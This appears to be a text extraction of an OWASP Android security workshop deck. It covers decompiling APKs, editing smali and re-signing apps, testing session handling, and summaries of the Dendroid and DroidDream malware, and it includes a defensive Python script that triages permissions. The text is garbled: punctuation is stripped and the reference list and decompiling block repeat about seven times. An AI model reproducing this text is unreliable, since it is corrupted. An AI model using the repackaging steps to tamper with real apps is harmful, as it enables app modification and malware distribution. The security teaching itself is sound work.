Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Lack of binary protection
• At this point, if you can read the source code of the application and modify its behaviour, the application doesn't have enough protection
Techniques to mitigate the Lack of Binary Protection
Verify Sign
Obfuscated
• Some obfuscation tools allow encrypting strings in the source code
  – ProGuard ()
  – DexProtector
  – DexGuard
Anti-Emulator
Debuggable
Demo Time 2
Demo
Demo: Decompiling with Luyten
Demo: Modify Smali Files
Demo
Recap
• We've seen how it's possible to change the behaviour of an app by disassembling it, modifying the smali code and recompiling the app
• Some techniques to "try" to prevent the lack of binary protection
MALWARE
Malware Statistics 1
Malware Statistics 2
Malware 1 - Flappy-bird
• Some applications ask for permissions that they don't need
• E.g. a game asking to send SMS
Malware 1 - Flappy-bird
• Some applications ask for permissions that they don't need
• E.g. a game asking to send SMS
Malware 2-iMatch
Permissions Dangerous 1
Permissions Dangerous 2
Dendroid botnet: a botnet developed specifically for attacking Android users, with functionalities like:
• Record call
• Block SMS
• Take video/photo
• Send text
• Send contacts
• Get user account
• Call number
• Update app
• Delete files
• Get browser history
• Get call history
• Get inbox SMS
Dendroid botnet - malware
Dendroid botnet - Manifest
Demo Time
DroidDream Malware
• Steal sensitive data
  – IMEI –> block phone
  – IMSI
  – Device model
  – SDK
DroidDream example 1 - Paint
• Access_coarse_location == GPS
• Read_phone_state
DroidDream example 1.1
DroidDream example 2 – Hotgirls
How to Protect Yourself
• Go to Settings → Security → turn OFF "Allow installation from unknown sources"
• Always keep an up-to-date anti-virus app
• Avoid unknown and unsecured Wi-Fi hotspots
Summary
• Obfuscate the code and mitigate the lack of binary protection using anti-emulator checks, etc.
• Be aware of what permissions you're giving to the application
• danielramirezmartingmailcom
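A static triage of an apktool-decoded app that ties together the mitigation checklist (Debuggable, Obfuscated) and the permission warnings from the malware slides; this is an added example, not code from the workshop. It assumes the layout that `apktool d app.apk -o out/` produces (a textual AndroidManifest.xml plus a smali/ tree) and writes a constructed sample directory to run against.

```python
"""Triage an apktool-decoded app: debuggable flag, risky permissions, obfuscation.

Reports android:debuggable, permissions behind the malware behaviours on the
slides (SMS fraud, IMEI/IMSI theft, location, call recording, contact and
call-log exfiltration) and a crude obfuscation heuristic: the share of one- or
two-letter class names that ProGuard/DexGuard renaming leaves behind.
"""
import tempfile
import xml.etree.ElementTree as ET
from pathlib import Path

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

SUSPICIOUS_PERMISSIONS = {
    "android.permission.SEND_SMS": "send SMS (premium-rate abuse)",
    "android.permission.RECEIVE_SMS": "intercept/block incoming SMS",
    "android.permission.READ_SMS": "read SMS inbox",
    "android.permission.READ_PHONE_STATE": "read IMEI/IMSI and device identity",
    "android.permission.ACCESS_COARSE_LOCATION": "coarse location",
    "android.permission.ACCESS_FINE_LOCATION": "GPS location",
    "android.permission.RECORD_AUDIO": "record calls/audio",
    "android.permission.CAMERA": "take photos/video",
    "android.permission.READ_CONTACTS": "exfiltrate contacts",
    "android.permission.READ_CALL_LOG": "read call history",
    "android.permission.CALL_PHONE": "place calls",
}

# Constructed manifest for a 'game' that, like the Flappy-bird sample, asks for SMS.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.game">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
    <application android:label="Game" android:debuggable="true">
        <activity android:name=".MainActivity"/>
    </application>
</manifest>
"""


def build_sample_dir():
    """Write a constructed apktool-style output directory and return its path."""
    root = Path(tempfile.mkdtemp(prefix="apktool_out_"))
    (root / "AndroidManifest.xml").write_text(SAMPLE_MANIFEST, encoding="utf-8")
    pkg = root / "smali" / "com" / "example" / "game"
    pkg.mkdir(parents=True)
    for cls in ("a", "b", "c", "MainActivity"):  # three renamed classes, one readable
        (pkg / f"{cls}.smali").write_text(f".class public Lcom/example/game/{cls};\n")
    return root


def parse_manifest(xml_text):
    """Package name, debuggable flag and declared permissions from a decoded manifest."""
    root = ET.fromstring(xml_text)
    app = root.find("application")
    return {
        "package": root.get("package"),
        "debuggable": app is not None and app.get(ANDROID_NS + "debuggable") == "true",
        "permissions": [e.get(ANDROID_NS + "name") for e in root.iter("uses-permission")],
    }


def short_class_ratio(smali_dir):
    """Fraction of classes whose outer name is at most two characters (heuristic)."""
    names = [p.stem.split("$")[0] for p in Path(smali_dir).rglob("*.smali")]
    if not names:
        return 0.0
    return sum(len(n) <= 2 for n in names) / len(names)


def triage(decoded_dir):
    decoded_dir = Path(decoded_dir)
    report = parse_manifest((decoded_dir / "AndroidManifest.xml").read_text(encoding="utf-8"))
    report["suspicious"] = {p: SUSPICIOUS_PERMISSIONS[p] for p in report["permissions"]
                            if p in SUSPICIOUS_PERMISSIONS}
    report["short_class_ratio"] = short_class_ratio(decoded_dir / "smali")
    findings = []
    if report["debuggable"]:
        findings.append("android:debuggable=true: a debugger can be attached to the release build")
    for perm, why in report["suspicious"].items():
        findings.append(f"{perm}: {why}")
    if report["short_class_ratio"] < 0.5:
        findings.append("few renamed classes: code is probably not obfuscated")
    report["findings"] = findings
    return report


if __name__ == "__main__":
    for line in triage(build_sample_dir())["findings"]:
        print(line)
```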
- Android security workshop
- Agenda
- Android fundamentals
- Agenda (2)
- Intro
- Stats
- Android Architecture
- Linux Kernel
- Libraries
- Android Runtime
- Dalvik VM
- ART VS DVM
- Application Framework
- Application Layer
- APK: how it works
- Android Application Security
- Android 60
- Defense layers
- Google Play
- Apps from Unknown Sources
- Verify Apps
- Verifying is on and visible when need
- Core security features to build secure application
- Slide 24
- Links
- Application Components Security
- Android Application Security (2)
- Android Application Security (3)
- Android Application Components
- Android Application Components (2)
- Android Manifest
- Android Manifest (2)
- Android Manifest (3)
- Intents
- Drozer
- Drozer (2)
- Drozer (3)
- Activity components
- Activity components attacks
- Activity components attacks (2)
- Activity components attacks (3)
- Activity components demo
- Services
- Services attacks
- Services attacks (2)
- Content providers
- Content providers (2)
- Content providers attacks
- Content providers attacks (2)
- Content providers attacks (3)
- Content providers attacks (4)
- Content providers demo
- Broadcast receivers
- Broadcast receivers (2)
- Broadcast receivers attacks
- Broadcast receivers attacks (2)
